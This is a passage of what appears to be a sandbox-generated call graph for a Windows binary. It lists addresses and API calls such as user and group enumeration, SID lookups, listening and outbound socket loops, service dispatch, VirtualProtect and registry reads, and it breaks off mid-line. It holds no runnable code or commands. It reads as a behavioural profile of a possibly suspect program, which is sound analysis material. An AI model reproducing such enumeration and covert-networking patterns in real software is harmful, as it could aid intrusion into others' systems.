59788->59794 59789->59805 59815 7ffb2270e0b6 16 API calls 59789->59815 59799 7ffb2270e366 59790->59799 59800 7ffb2270e288 59790->59800 59791->59805 59817 7ffb2270de24 53 API calls 59791->59817 59825 7ffb2270e146 16 API calls 59793->59825 59801 7ffb2270e31b 59794->59801 59806 7ffb2270e23a 59794->59806 59824 7ffb2270dfe2 49 API calls 59799->59824 59804 7ffb2270e28f 59800->59804 59800->59805 59819 7ffb2270d1e9 18 API calls 59801->59819 59816 7ffb2270d8f6 57 API calls 59804->59816 59805->59725 59806->59805 59814 7ffb2270d262 14 API calls 59806->59814 59810 7ffb2270e294 59810->59805 59826 7ffb2270d030 59811->59826 59814->59805 59815->59805 59816->59810 59817->59805 59818->59805 59819->59805 59820->59805 59821->59810 59822->59805 59823->59805 59824->59805 59825->59805 59853 7ffb22701b9b 59826->59853 59831 7ffb2270d080 59859 7ffb22708f58 17 API calls 59831->59859 59832 7ffb2270d087 59834 7ffb22709395 GetSystemTimeAsFileTime 59832->59834 59837 7ffb2270d09a 59834->59837 59835 7ffb2270d1b8 59861 7ffb22708f58 17 API calls 59835->59861 59837->59835 59839 7ffb2270d0c6 strlen 59837->59839 59838 7ffb2270d1bd 59841 7ffb22701b9b 2 API calls 59838->59841 59843 7ffb2270d05a 59838->59843 59840 7ffb227040d2 6 API calls 59839->59840 59842 7ffb2270d0fe GetProcessHeap HeapAlloc 59840->59842 59841->59843 59844 7ffb2270d19d 59842->59844 59845 7ffb2270d120 59842->59845 59843->59805 59847 7ffb227040d2 6 API calls 59844->59847 59846 7ffb22709395 GetSystemTimeAsFileTime 59845->59846 59848 7ffb2270d14f strcpy 59846->59848 59849 7ffb2270d1b3 59847->59849 59860 7ffb227014a2 13 API calls 59848->59860 59849->59835 59851 7ffb2270d178 59851->59837 59852 7ffb2270d181 GetProcessHeap HeapFree 59851->59852 59852->59837 59854 7ffb22701ba6 59853->59854 59855 7ffb22701bb1 QueryPerformanceFrequency QueryPerformanceCounter 59853->59855 59854->59843 59856 7ffb22708f37 EnterCriticalSection 59854->59856 59855->59854 59862 7ffb22707539 59856->59862 59859->59843 59860->59851 59861->59838 59863 7ffb22707555 59862->59863 59864 7ffb22707545 59862->59864 59868 7ffb2270648f 59863->59868 59866 7ffb2270754f 59864->59866 59890 7ffb22706d5f 59864->59890 59866->59831 59866->59832 59912 7ffb227063af 8 API calls 59868->59912 59870 7ffb22706ab2 59871 7ffb22706af8 59870->59871 59872 7ffb22706abb 59870->59872 59875 7ffb227040d2 6 API calls 59871->59875 59874 7ffb22706c09 59872->59874 59889 7ffb22706ac3 59872->59889 59873 7ffb227069ac NetLocalGroupEnum 59876 7ffb227064a4 59873->59876 59878 7ffb227040d2 6 API calls 59874->59878 59875->59889 59876->59870 59876->59873 59879 7ffb22706989 NetApiBufferFree 59876->59879 59880 7ffb22706a22 GetProcessHeap HeapAlloc 59876->59880 59882 7ffb22706ae5 59878->59882 59879->59876 59883 7ffb22706a55 59880->59883 59888 7ffb227064b3 59880->59888 59881 7ffb22706ac8 59885 7ffb227040d2 6 API calls 59881->59885 59882->59864 59886 7ffb22706a61 memcpy GetProcessHeap HeapFree 59883->59886 59887 7ffb22706a90 59883->59887 59884 7ffb227040d2 6 API calls 59884->59888 59885->59882 59886->59887 59887->59864 59888->59876 59888->59884 59913 7ffb227063af 8 API calls 59889->59913 59914 7ffb22706c7f 59890->59914 59892 7ffb227073c3 59894 7ffb22707409 59892->59894 59895 7ffb227073cc 59892->59895 59893 7ffb227072a6 NetUserEnum 59897 7ffb22706d74 59893->59897 59896 7ffb227040d2 6 API calls 59894->59896 59898 7ffb2270751a 59895->59898 59903 7ffb227073d4 59895->59903 59896->59903 59897->59892 59897->59893 59899 7ffb22707283 NetApiBufferFree 59897->59899 59900 7ffb22707322 GetProcessHeap HeapAlloc 59897->59900 59902 7ffb227040d2 6 API calls 59898->59902 59899->59897 59904 7ffb2270735c 59900->59904 59911 7ffb22706d83 59900->59911 59901 7ffb22706c7f 8 API calls 59905 7ffb227073d9 59901->59905 59906 7ffb227073f6 59902->59906 59903->59901 59907 7ffb22707368 memcpy GetProcessHeap HeapFree 59904->59907 59908 7ffb227073a1 59904->59908 59910 7ffb227040d2 6 API calls 59905->59910 59906->59866 59907->59908 59908->59866 59909 7ffb227040d2 6 API calls 59909->59911 59910->59906 59911->59897 59911->59909 59912->59876 59913->59881 59915 7ffb22706d44 59914->59915 59916 7ffb22706c92 59914->59916 59915->59897 59917 7ffb22706d21 59916->59917 59918 7ffb22706ccd GetProcessHeap HeapFree 59916->59918 59920 7ffb22706cf2 GetProcessHeap HeapFree 59916->59920 59921 7ffb22706c9d LocalFree 59916->59921 59922 7ffb22706d19 LocalFree 59916->59922 59917->59915 59919 7ffb22706d2d GetProcessHeap HeapFree 59917->59919 59918->59916 59919->59915 59920->59916 59921->59916 59922->59916 59923 7ffb23ab3553 59941 7ffb23ab3563 59923->59941 59924 7ffb23ab3774 59925 7ffb23ab376e 59925->59924 60014 7ffb23ab2785 10 API calls 59925->60014 59929 7ffb23ab3593 Sleep 59929->59941 59931 7ffb23ab2785 10 API calls 59931->59941 59934 7ffb23ab363e GetProcessHeap HeapAlloc 59935 7ffb23ab3664 CreateThread 59934->59935 59934->59941 59936 7ffb23ab36a3 EnterCriticalSection 59935->59936 59937 7ffb23ab3721 GetLastError 59935->59937 59940 7ffb23ab36c3 LeaveCriticalSection 59936->59940 59939 7ffb23ab2072 6 API calls 59937->59939 59938 7ffb23ab2072 6 API calls 59938->59941 59939->59941 60003 7ffb23ab2072 59940->60003 59941->59925 59941->59929 59941->59931 59941->59934 59941->59938 59944 7ffb23ab3752 GetProcessHeap HeapFree 59941->59944 59945 7ffb23ab28ba socket 59941->59945 59963 7ffb23ab26b9 59941->59963 59969 7ffb23ab2604 setsockopt 59941->59969 59976 7ffb23ab2c99 59941->59976 59999 7ffb23ab27ea setsockopt 59941->59999 59944->59941 59946 7ffb23ab28eb 59945->59946 59947 7ffb23ab29c2 WSAGetLastError 59945->59947 59949 7ffb23ab27ea 8 API calls 59946->59949 59948 7ffb23ab2072 6 API calls 59947->59948 59950 7ffb23ab29e6 59948->59950 59951 7ffb23ab28f8 59949->59951 59954 7ffb23ab2072 6 API calls 59950->59954 59958 7ffb23ab29b9 59950->59958 59952 7ffb23ab29b1 59951->59952 59953 7ffb23ab2901 htonl htons bind 59951->59953 60015 7ffb23ab2785 10 API calls 59952->60015 59955 7ffb23ab2984 WSAGetLastError 59953->59955 59956 7ffb23ab2941 listen 59953->59956 59954->59958 59960 7ffb23ab2072 6 API calls 59955->59960 59956->59950 59959 7ffb23ab295a WSAGetLastError 59956->59959 59958->59941 59961 7ffb23ab2072 6 API calls 59959->59961 59962 7ffb23ab2982 59960->59962 59961->59962 59962->59950 59962->59952 59964 7ffb23ab26c9 ioctlsocket 59963->59964 59966 7ffb23ab26fd WSAGetLastError 59964->59966 59967 7ffb23ab26ec 59964->59967 59968 7ffb23ab2072 6 API calls 59966->59968 59967->59941 59968->59967 59970 7ffb23ab2694 WSAGetLastError 59969->59970 59971 7ffb23ab2639 setsockopt 59969->59971 59973 7ffb23ab2072 6 API calls 59970->59973 59972 7ffb23ab266f WSAGetLastError 59971->59972 59975 7ffb23ab2665 59971->59975 59974 7ffb23ab2072 6 API calls 59972->59974 59973->59975 59974->59975 59975->59941 59977 7ffb23ab2cc4 59976->59977 59978 7ffb23ab2d58 accept 59976->59978 59979 7ffb23ab26b9 8 API calls 59977->59979 59980 7ffb23ab2e9a WSAGetLastError 59978->59980 59981 7ffb23ab2d7e 59978->59981 59982 7ffb23ab2cce 59979->59982 59983 7ffb23ab2072 6 API calls 59980->59983 59984 7ffb23ab26b9 8 API calls 59981->59984 59985 7ffb23ab2cee select 59982->59985 59996 7ffb23ab2cd3 59982->59996 59983->59996 59986 7ffb23ab2d8b 59984->59986 59987 7ffb23ab2e29 59985->59987 59988 7ffb23ab2d52 59985->59988 59989 7ffb23ab2e86 59986->59989 59990 7ffb23ab2d94 htonl htons 59986->59990 59993 7ffb23ab2072 6 API calls 59987->59993 59988->59978 59992 7ffb23ab2e53 WSAGetLastError 59988->59992 60016 7ffb23ab2785 10 API calls 59989->60016 59995 7ffb23ab2db7 59990->59995 59997 7ffb23ab2072 6 API calls 59992->59997 59993->59996 59998 7ffb23ab2072 6 API calls 59995->59998 59996->59941 59997->59996 59998->59996 60000 7ffb23ab2827 59999->60000 60001 7ffb23ab2831 WSAGetLastError 59999->60001 60000->59941 60002 7ffb23ab2072 6 API calls 60001->60002 60002->60000 60004 7ffb23ab2080 60003->60004 60017 7ffb23abb130 60004->60017 60007 7ffb23ab2130 60007->59941 60008 7ffb23ab2107 fwrite fflush 60008->60007 60009 7ffb23ab213c EnterCriticalSection 60010 7ffb23ab2156 LeaveCriticalSection 60009->60010 60011 7ffb23ab2173 60009->60011 60010->60008 60012 7ffb23ab21ad CopyFileA 60011->60012 60013 7ffb23ab21e5 60012->60013 60013->60010 60014->59924 60015->59958 60016->59996 60018 7ffb23abb155 60017->60018 60019 7ffb23abb13e 60017->60019 60024 7ffb23abc190 fputc 60018->60024 60023 7ffb23abc190 fputc 60019->60023 60022 7ffb23ab20d9 60022->60007 60022->60008 60022->60009 60023->60022 60024->60022 60025 7ffb23ad26da 60031 7ffb23ad26e5 60025->60031 60026 7ffb23ad27ee 60027 7ffb23ad27fb 60026->60027 60084 7ffb23ad4055 31 API calls 60026->60084 60029 7ffb23ad270d Sleep 60029->60031 60031->60026 60031->60029 60033 7ffb23ad27c2 Sleep 60031->60033 60034 7ffb23ad4055 31 API calls 60031->60034 60036 7ffb23ad27ae memcpy 60031->60036 60037 7ffb23ad42ec socket 60031->60037 60072 7ffb23ad479a 60031->60072 60083 7ffb23ad2610 30 API calls 60031->60083 60033->60031 60034->60031 60036->60031 60038 7ffb23ad4323 60037->60038 60039 7ffb23ad44eb WSAGetLastError 60037->60039 60040 7ffb23ad4327 60038->60040 60041 7ffb23ad4345 60038->60041 60042 7ffb23ad1352 27 API calls 60039->60042 60085 7ffb23ad3f89 60040->60085 60043 7ffb23ad3f89 29 API calls 60041->60043 60045 7ffb23ad450f 60042->60045 60048 7ffb23ad4343 60043->60048 60046 7ffb23ad4519 60045->60046 60047 7ffb23ad435f 60045->60047 60102 7ffb23ad1352 60046->60102 60052 7ffb23ad1352 27 API calls 60047->60052 60051 7ffb23ad4357 60048->60051 60098 7ffb23ad40ba setsockopt 60048->60098 60113 7ffb23ad4055 31 API calls 60051->60113 60054 7ffb23ad4380 60052->60054 60053 7ffb23ad439e 60053->60051 60057 7ffb23ad43a3 htonl htons connect 60053->60057 60054->60031 60059 7ffb23ad43e1 60057->60059 60060 7ffb23ad43fc WSAGetLastError 60057->60060 60063 7ffb23ad3f89 29 API calls 60059->60063 60061 7ffb23ad440d 60060->60061 60062 7ffb23ad44be WSAGetLastError 60060->60062 60061->60051 60064 7ffb23ad4415 select 60061->60064 60065 7ffb23ad1352 27 API calls 60062->60065 60066 7ffb23ad43ee 60063->60066 60067 7ffb23ad4476 60064->60067 60068 7ffb23ad44a0 60064->60068 60065->60051 60066->60045 60066->60051 60067->60059 60069 7ffb23ad447c WSAGetLastError 60067->60069 60070 7ffb23ad1352 27 API calls 60068->60070 60071 7ffb23ad1352 27 API calls 60069->60071 60070->60051 60071->60051 60073 7ffb23ad4828 60072->60073 60074 7ffb23ad47b4 60072->60074 60075 7ffb23ad1352 27 API calls 60073->60075 60074->60073 60076 7ffb23ad47b9 recv 60074->60076 60077 7ffb23ad47d3 60075->60077 60078 7ffb23ad47cf 60076->60078 60079 7ffb23ad47dc WSAGetLastError 60076->60079 60077->60031 60078->60077 60082 7ffb23ad1352 27 API calls 60078->60082 60079->60077 60080 7ffb23ad47f0 60079->60080 60081 7ffb23ad1352 27 API calls 60080->60081 60081->60077 60082->60077 60083->60031 60084->60027 60086 7ffb23ad3f99 ioctlsocket 60085->60086 60088 7ffb23ad3fbc 60086->60088 60089 7ffb23ad3fcd WSAGetLastError 60086->60089 60088->60053 60091 7ffb23ad3ed4 setsockopt 60088->60091 60090 7ffb23ad1352 27 API calls 60089->60090 60090->60088 60092 7ffb23ad3f09 setsockopt 60091->60092 60093 7ffb23ad3f64 WSAGetLastError 60091->60093 60094 7ffb23ad3f3f WSAGetLastError 60092->60094 60097 7ffb23ad3f35 60092->60097 60095 7ffb23ad1352 27 API calls 60093->60095 60096 7ffb23ad1352 27 API calls 60094->60096 60095->60097 60096->60097 60097->60048 60099 7ffb23ad4101 WSAGetLastError 60098->60099 60101 7ffb23ad40f7 60098->60101 60100 7ffb23ad1352 27 API calls 60099->60100 60100->60101 60101->60053 60103 7ffb23ad1360 60102->60103 60114 7ffb23add0c0 60103->60114 60106 7ffb23ad13e7 fwrite fflush 60108 7ffb23ad1410 60106->60108 60107 7ffb23ad141c EnterCriticalSection 60109 7ffb23ad1436 LeaveCriticalSection 60107->60109 60110 7ffb23ad1453 60107->60110 60108->60054 60109->60106 60111 7ffb23ad148d CopyFileA 60110->60111 60112 7ffb23ad14c5 60111->60112 60112->60109 60113->60047 60115 7ffb23add0e5 60114->60115 60116 7ffb23add0ce 60114->60116 60121 7ffb23ade120 22 API calls 60115->60121 60120 7ffb23ade120 22 API calls 60116->60120 60119 7ffb23ad13b9 60119->60106 60119->60107 60119->60108 60120->60119 60121->60119 60122 7ffb22707174 60156 7ffb22706da3 60122->60156 60123 7ffb227071c3 wcslen GetProcessHeap HeapAlloc 60123->60156 60124 7ffb22707283 NetApiBufferFree 60127 7ffb22707273 60124->60127 60125 7ffb22707234 GetProcessHeap HeapAlloc 60129 7ffb22707258 60125->60129 60125->60156 60126 7ffb227073c3 60131 7ffb22707409 60126->60131 60132 7ffb227073cc 60126->60132 60127->60124 60127->60126 60130 7ffb227072a6 NetUserEnum 60127->60130 60138 7ffb22707322 GetProcessHeap HeapAlloc 60127->60138 60128 7ffb227040d2 6 API calls 60128->60156 60134 7ffb227040d2 6 API calls 60129->60134 60129->60156 60130->60127 60133 7ffb227040d2 6 API calls 60131->60133 60136 7ffb2270751a 60132->60136 60137 7ffb227073d4 60132->60137 60133->60137 60134->60129 60135 7ffb22706dce LocalAlloc 60135->60156 60140 7ffb227040d2 6 API calls 60136->60140 60139 7ffb22706c7f 8 API calls 60137->60139 60141 7ffb22706d83 60138->60141 60142 7ffb2270735c 60138->60142 60144 7ffb227073d9 60139->60144 60145 7ffb227073f6 60140->60145 60141->60127 60149 7ffb227040d2 6 API calls 60141->60149 60146 7ffb22707368 memcpy GetProcessHeap HeapFree 60142->60146 60147 7ffb227073a1 60142->60147 60143 7ffb22706ded wcsncpy 60164 7ffb227093ef 60143->60164 60150 7ffb227040d2 6 API calls 60144->60150 60146->60147 60149->60141 60150->60145 60152 7ffb22706ebe GetLastError 60155 7ffb22706ee1 LocalAlloc 60152->60155 60152->60156 60153 7ffb22706e75 GetLastError 60159 7ffb227040d2 6 API calls 60153->60159 60154 7ffb22707070 ConvertSidToStringSidA 60154->60156 60157 7ffb227070c1 GetLastError 60154->60157 60155->60156 60158 7ffb22706eff LookupAccountNameW 60155->60158 60156->60123 60156->60125 60156->60127 60156->60128 60156->60135 60156->60143 60156->60153 60156->60154 60160 7ffb22706f33 LocalFree 60156->60160 60162 7ffb227040d2 6 API calls 60157->60162 60158->60160 60161 7ffb22706f41 GetLastError 60158->60161 60159->60156 60160->60156 60163 7ffb227040d2 6 API calls 60161->60163 60162->60156 60163->60156 60165 7ffb22709417 wcslen 60164->60165 60166 7ffb22706e17 LookupAccountNameW 60164->60166 60165->60166 60166->60152 60166->60156 60167 7ffb23ab3937 60180 7ffb23ab3941 60167->60180 60168 7ffb23ab39da EnterCriticalSection 60168->60180 60169 7ffb23ab3a27 EnterCriticalSection 60175 7ffb23ab3a34 60169->60175 60170 7ffb23ab3a8f LeaveCriticalSection 60171 7ffb23ab3a40 WaitForSingleObject 60183 7ffb23ab2785 10 API calls 60171->60183 60172 7ffb23ab3967 LeaveCriticalSection 60174 7ffb23ab3a1a Sleep SleepEx 60172->60174 60172->60180 60174->60169 60175->60170 60175->60171 60177 7ffb23ab3a76 GetProcessHeap HeapFree 60175->60177 60176 7ffb23ab2072 6 API calls 60178 7ffb23ab3994 WaitForSingleObject 60176->60178 60177->60175 60182 7ffb23ab2785 10 API calls 60178->60182 60180->60168 60180->60169 60180->60172 60180->60176 60181 7ffb23ab39b9 GetProcessHeap HeapFree 60180->60181 60181->60180 60182->60180 60183->60175 60184 7ff7aabd12fd 60187 7ff7aabd1131 60184->60187 60188 7ff7aabd115a 60187->60188 60189 7ff7aabd1172 60188->60189 60190 7ff7aabd1169 Sleep 60188->60190 60191 7ff7aabd1194 60189->60191 60192 7ff7aabd1188 _amsg_exit 60189->60192 60190->60188 60193 7ff7aabd11b5 60191->60193 60194 7ff7aabd119a _initterm 60191->60194 60192->60193 60195 7ff7aabd11c5 _initterm 60193->60195 60196 7ff7aabd11de 60193->60196 60194->60193 60195->60196 60208 7ff7aabda1bb 60196->60208 60199 7ff7aabd122e 60200 7ff7aabd1233 malloc 60199->60200 60201 7ff7aabd1253 60200->60201 60202 7ff7aabd1283 60201->60202 60203 7ff7aabd1258 strlen malloc 60201->60203 60219 7ff7aabd1fa9 60202->60219 60203->60201 60205 7ff7aabd12c4 60206 7ff7aabd12e3 _cexit 60205->60206 60207 7ff7aabd12e8 60205->60207 60206->60207 60209 7ff7aabd1208 SetUnhandledExceptionFilter 60208->60209 60211 7ff7aabda1d9 60208->60211 60209->60199 60210 7ff7aabda3df 60210->60209 60213 7ff7aabda407 VirtualProtect 60210->60213 60211->60210 60212 7ff7aabda250 60211->60212 60217 7ff7aabda28f 60211->60217 60212->60210 60215 7ff7aabda26e 60212->60215 60213->60210 60215->60212 60223 7ff7aabda074 VirtualQuery VirtualProtect GetLastError 60215->60223 60216 7ff7aabda2fa 60224 7ff7aabda074 VirtualQuery VirtualProtect GetLastError 60216->60224 60217->60210 60217->60216 60220 7ff7aabd1fb9 60219->60220 60225 7ff7aabd1dbc 60220->60225 60223->60215 60224->60217 60226 7ff7aabd1dc6 strcmp 60225->60226 60228 7ff7aabd1e40 60226->60228 60229 7ff7aabd1ddd strcmp 60226->60229 60246 7ff7aabd161a 60228->60246 60230 7ff7aabd1df4 StartServiceCtrlDispatcherA 60229->60230 60231 7ff7aabd1f81 60229->60231 60234 7ff7aabd1e98 GetLastError 60230->60234 60238 7ff7aabd1e2d 60230->60238 60233 7ff7aabd2ef2 6 API calls 60231->60233 60233->60238 60312 7ff7aabd2ef2 60234->60312 60236 7ff7aabd1e4b 60265 7ff7aabd1a63 10 API calls 60236->60265 60238->60205 60241 7ff7aabd1e50 60266 7ff7aabd1b1c 13 API calls 60241->60266 60243 7ff7aabd1e69 _read 60243->60236 60244 7ff7aabd1e5f 60243->60244 60244->60236 60244->60243 60303 7ff7aabd19e2 60244->60303 60323 7ff7aabd1fd0 GetModuleHandleExA 60246->60323 60252 7ff7aabd1650 60252->60236 60267 7ff7aabd16e3 60252->60267 60253 7ff7aabd164c 60253->60252 60385 7ff7aabd28fc 60253->60385 60260 7ff7aabd1fd0 8 API calls 60261 7ff7aabd16b0 60260->60261 60262 7ff7aabd7689 12 API calls 60261->60262 60263 7ff7aabd16c9 60262->60263 60263->60252 60437 7ff7aabd3452 60263->60437 60265->60241 60266->60238 60268 7ff7aabd1fd0 8 API calls 60267->60268 60269 7ff7aabd172e 60268->60269 60270 7ff7aabd758b 8 API calls 60269->60270 60271 7ff7aabd1743 60270->60271 60272 7ff7aabd174d strlen 60271->60272 60281 7ff7aabd1942 60271->60281 60273 7ff7aabd1783 _mbscpy strlen strlen 60272->60273 60274 7ff7aabd176a 60272->60274 60280 7ff7aabd17ca 60273->60280 60274->60273 60276 7ff7aabd176f strlen 60274->60276 60275 7ff7aabd197a 60275->60244 60276->60273 60277 7ff7aabd1938 60843 7ff7aabd4788 FindClose 60277->60843 60279 7ff7aabd47a3 12 API calls 60279->60280 60280->60277 60280->60279 60283 7ff7aabd2304 8 API calls 60280->60283 60287 7ff7aabd1895 60280->60287 60288 7ff7aabd17ee FreeLibrary 60280->60288 60290 7ff7aabd2283 8 API calls 60280->60290 60842 7ff7aabd1360 SetServiceStatus 60280->60842 60281->60275 60282 7ff7aabd1959 60281->60282 60284 7ff7aabd2ef2 6 API calls 60281->60284 60755 7ffb22761b80 60281->60755 60768 7ffb227054b0 60281->60768 60783 7ffb23ab90d0 60281->60783 60794 7ffb23b08a60 60281->60794 60812 7ffb2273ff40 60281->60812 60829 7ffb23ad1290 60281->60829 60844 7ff7aabd1360 SetServiceStatus 60281->60844 60285 7ff7aabd2ef2 6 API calls 60282->60285 60283->60280 60284->60281 60285->60275 60289 7ff7aabd2ef2 6 API calls 60287->60289 60288->60280 60291 7ff7aabd18ad GetProcessHeap HeapAlloc 60289->60291 60290->60280 60293 7ff7aabd18cf _mbscpy 60291->60293 60294 7ff7aabd18f6 60291->60294 60293->60294 60296 7ff7aabd191b 60293->60296 60295 7ff7aabd2ef2 6 API calls 60294->60295 60295->60296 60296->60277 60296->60296 60304 7ff7aabd1fd0 8 API calls 60303->60304 60305 7ff7aabd1a11 60304->60305 60306 7ff7aabd758b 8 API calls 60305->60306 60307 7ff7aabd1a23 60306->60307 60308 7ff7aabd13cd 20 API calls 60307->60308 60310 7ff7aabd1a29 60307->60310 60309 7ff7aabd1a3f 60308->60309 60309->60310 60311 7ff7aabd1a4c SleepEx 60309->60311 60310->60244 60311->60310 60313 7ff7aabd2f00 60312->60313 62234 7ff7aabdaa60 60313->62234 60316 7ff7aabd2fbc EnterCriticalSection 60318 7ff7aabd2fd6 LeaveCriticalSection 60316->60318 60320 7ff7aabd2ff3 60316->60320 60317 7ff7aabd2f87 fwrite fflush 60319 7ff7aabd2fb0 60317->60319 60318->60317 60319->60238 60321 7ff7aabd302d CopyFileA 60320->60321 60322 7ff7aabd3065 60321->60322 60322->60318 60324 7ff7aabd2002 GetLastError 60323->60324 60325 7ff7aabd162f 60323->60325 60326 7ff7aabd2ef2 6 API calls 60324->60326 60327 7ff7aabd7689 60325->60327 60326->60325 60328 7ff7aabd76cf 60327->60328 60329 7ff7aabd769f 60327->60329 60331 7ff7aabd2ef2 6 API calls 60328->60331 60460 7ff7aabd758b 60329->60460 60336 7ff7aabd1648 60331->60336 60333 7ff7aabd76ff strlen 60334 7ff7aabd7711 60333->60334 60335 7ff7aabd7727 _mbscat strlen 60333->60335 60334->60335 60337 7ff7aabd7716 strlen 60334->60337 60335->60336 60336->60253 60338 7ff7aabd685f 60336->60338 60337->60335 60339 7ff7aabd6876 60338->60339 60340 7ff7aabd6962 60338->60340 60342 7ff7aabd687f CreateFileA 60339->60342 60343 7ff7aabd6992 60339->60343 60341 7ff7aabd2ef2 6 API calls 60340->60341 60344 7ff7aabd6917 60341->60344 60346 7ff7aabd69c5 GetLastError 60342->60346 60347 7ff7aabd68ca LockFileEx 60342->60347 60345 7ff7aabd2ef2 6 API calls 60343->60345 60353 7ff7aabd6941 60344->60353 60354 7ff7aabd6c29 60344->60354 60345->60344 60348 7ff7aabd2ef2 6 API calls 60346->60348 60349 7ff7aabd68fe 60347->60349 60350 7ff7aabd6aaa GetLastError 60347->60350 60358 7ff7aabd69e6 60348->60358 60349->60344 60352 7ff7aabd6c1b CloseHandle 60349->60352 60351 7ff7aabd2ef2 6 API calls 60350->60351 60360 7ff7aabd6acb 60351->60360 60352->60354 60355 7ff7aabd2ef2 6 API calls 60353->60355 60356 7ff7aabd2ef2 6 API calls 60354->60356 60357 7ff7aabd1669 60355->60357 60356->60357 60357->60252 60361 7ff7aabd309c InitializeCriticalSectionAndSpinCount 60357->60361 60358->60350 60359 7ff7aabd6b53 60358->60359 60359->60352 60360->60359 60362 7ff7aabd31ed GetLastError 60361->60362 60363 7ff7aabd30ca 60361->60363 60365 7ff7aabd2ef2 6 API calls 60362->60365 60364 7ff7aabd1fd0 8 API calls 60363->60364 60366 7ff7aabd30e6 60364->60366 60373 7ff7aabd31c6 60365->60373 60367 7ff7aabd758b 8 API calls 60366->60367 60368 7ff7aabd30fa 60367->60368 60369 7ff7aabd3104 strlen 60368->60369 60368->60373 60371 7ff7aabd3133 60369->60371 60372 7ff7aabd311d 60369->60372 60370 7ff7aabd2ef2 6 API calls 60374 7ff7aabd31e3 60370->60374 60376 7ff7aabd3158 strlen fopen 60371->60376 60377 7ff7aabd3138 _mbscat strlen 60371->60377 60372->60371 60375 7ff7aabd3122 strlen 60372->60375 60373->60370 60374->60253 60375->60371 60378 7ff7aabd31a4 60376->60378 60379 7ff7aabd32ba 60376->60379 60377->60376 60380 7ff7aabd2ef2 6 API calls 60378->60380 60381 7ff7aabd2ef2 6 API calls 60379->60381 60382 7ff7aabd31be 60380->60382 60381->60373 60382->60373 60383 7ff7aabd332a 60382->60383 60384 7ff7aabd2ef2 6 API calls 60383->60384 60384->60374 60474 7ff7aabd2304 60385->60474 60389 7ff7aabd2963 FreeLibrary 60392 7ff7aabd29c3 GetNativeSystemInfo GetWindowsDirectoryA 60389->60392 60412 7ff7aabd2999 60389->60412 60391 7ff7aabd2ef2 6 API calls 60393 7ff7aabd167e 60391->60393 60395 7ff7aabd2ae0 60392->60395 60396 7ff7aabd2a02 GetLastError 60392->60396 60393->60252 60420 7ff7aabd14ef 60393->60420 60399 7ff7aabd2ef2 6 API calls 60395->60399 60398 7ff7aabd2ef2 6 API calls 60396->60398 60397 7ff7aabd2ef2 6 API calls 60397->60389 60398->60412 60400 7ff7aabd2b01 60399->60400 60400->60412 60490 7ff7aabd9242 60400->60490 60408 7ff7aabd2b3d 60408->60412 60412->60391 60421 7ff7aabd1fd0 8 API calls 60420->60421 60422 7ff7aabd1534 60421->60422 60423 7ff7aabd758b 8 API calls 60422->60423 60424 7ff7aabd1546 60423->60424 60425 7ff7aabd1576 60424->60425 60426 7ff7aabd154c _mbscpy 60424->60426 60427 7ff7aabd2ef2 6 API calls 60425->60427 60517 7ff7aabd13cd strlen 60426->60517 60429 7ff7aabd15a1 60427->60429 60429->60252 60429->60260 60431 7ff7aabd1572 60431->60425 60433 7ff7aabd15f1 60431->60433 60438 7ff7aabd3505 60437->60438 60439 7ff7aabd347a 60437->60439 60440 7ff7aabd2ef2 6 API calls 60438->60440 60441 7ff7aabd4fc5 30 API calls 60439->60441 60461 7ff7aabd75d2 60460->60461 60462 7ff7aabd759c 60460->60462 60465 7ff7aabd2ef2 6 API calls 60461->60465 60463 7ff7aabd75a1 60462->60463 60464 7ff7aabd7602 60462->60464 60466 7ff7aabd7632 60463->60466 60467 7ff7aabd75aa 60463->60467 60468 7ff7aabd2ef2 6 API calls 60464->60468 60471 7ff7aabd75b7 60465->60471 60469 7ff7aabd2ef2 6 API calls 60466->60469 60473 7ff7aabd744c 8 API calls 60467->60473 60468->60471 60469->60471 60471->60333 60471->60336 60472 7ff7aabd75af 60472->60471 60473->60472 60475 7ff7aabd2312 LoadLibraryA 60474->60475 60476 7ff7aabd233b 60474->60476 60477 7ff7aabd2320 60475->60477 60478 7ff7aabd233e GetLastError 60475->60478 60476->60478 60479 7ff7aabd2ef2 6 API calls 60477->60479 60480 7ff7aabd2ef2 6 API calls 60478->60480 60481 7ff7aabd2339 60479->60481 60480->60481 60481->60412 60482 7ff7aabd2283 60481->60482 60483 7ff7aabd22a0 GetProcAddress 60482->60483 60484 7ff7aabd22d1 60482->60484 60485 7ff7aabd22d6 GetLastError 60483->60485 60486 7ff7aabd22b1 60483->60486 60484->60485 60488 7ff7aabd2ef2 6 API calls 60485->60488 60487 7ff7aabd2ef2 6 API calls 60486->60487 60489 7ff7aabd22cf 60487->60489 60488->60489 60489->60389 60489->60397 60491 7ff7aabd926b 60490->60491 60492 7ff7aabd92ca 60490->60492 60494 7ff7aabd9274 60491->60494 60495 7ff7aabd932d 60491->60495 60493 7ff7aabd2ef2 6 API calls 60492->60493 60515 7ff7aabd9323 60492->60515 60493->60515 60497 7ff7aabd9360 60494->60497 60498 7ff7aabd927d 60494->60498 60496 7ff7aabd2ef2 6 API calls 60495->60496 60496->60515 60499 7ff7aabd2ef2 6 API calls 60497->60499 60500 7ff7aabd9393 60498->60500 60501 7ff7aabd9286 RegOpenKeyExA 60498->60501 60499->60515 60502 7ff7aabd2ef2 6 API calls 60500->60502 60504 7ff7aabd93c6 RegQueryValueExA 60501->60504 60505 7ff7aabd92ad 60501->60505 60502->60515 60503 7ff7aabd9526 60510 7ff7aabd96ec 60503->60510 60512 7ff7aabd2ef2 6 API calls 60503->60512 60514 7ff7aabd93f4 60504->60514 60516 7ff7aabd9447 RegCloseKey 60504->60516 60506 7ff7aabd2ef2 6 API calls 60505->60506 60506->60492 60507 7ff7aabd96c9 60509 7ff7aabd2ef2 6 API calls 60507->60509 60511 7ff7aabd9569 60509->60511 60511->60408 60512->60511 60514->60516 60515->60503 60515->60507 60516->60515 60518 7ff7aabd13fd strlen 60517->60518 60519 7ff7aabd13e7 60517->60519 60570 7ff7aabd6e87 60518->60570 60519->60518 60520 7ff7aabd13ec strlen 60519->60520 60520->60518 60522 7ff7aabd1425 60524 7ff7aabd1487 strlen 60522->60524 60525 7ff7aabd14c8 60522->60525 60528 7ff7aabd14b4 strlen 60522->60528 60529 7ff7aabd1436 60522->60529 60576 7ff7aabd47a3 60522->60576 60526 7ff7aabd6e87 8 API calls 60524->60526 60600 7ff7aabd4788 FindClose 60525->60600 60526->60522 60528->60522 60529->60431 60530 7ff7aabd7750 60529->60530 60571 7ff7aabd6ea5 60570->60571 60572 7ff7aabd6e90 GetFileAttributesA 60570->60572 60574 7ff7aabd2ef2 6 API calls 60571->60574 60573 7ff7aabd6ed5 GetLastError 60572->60573 60575 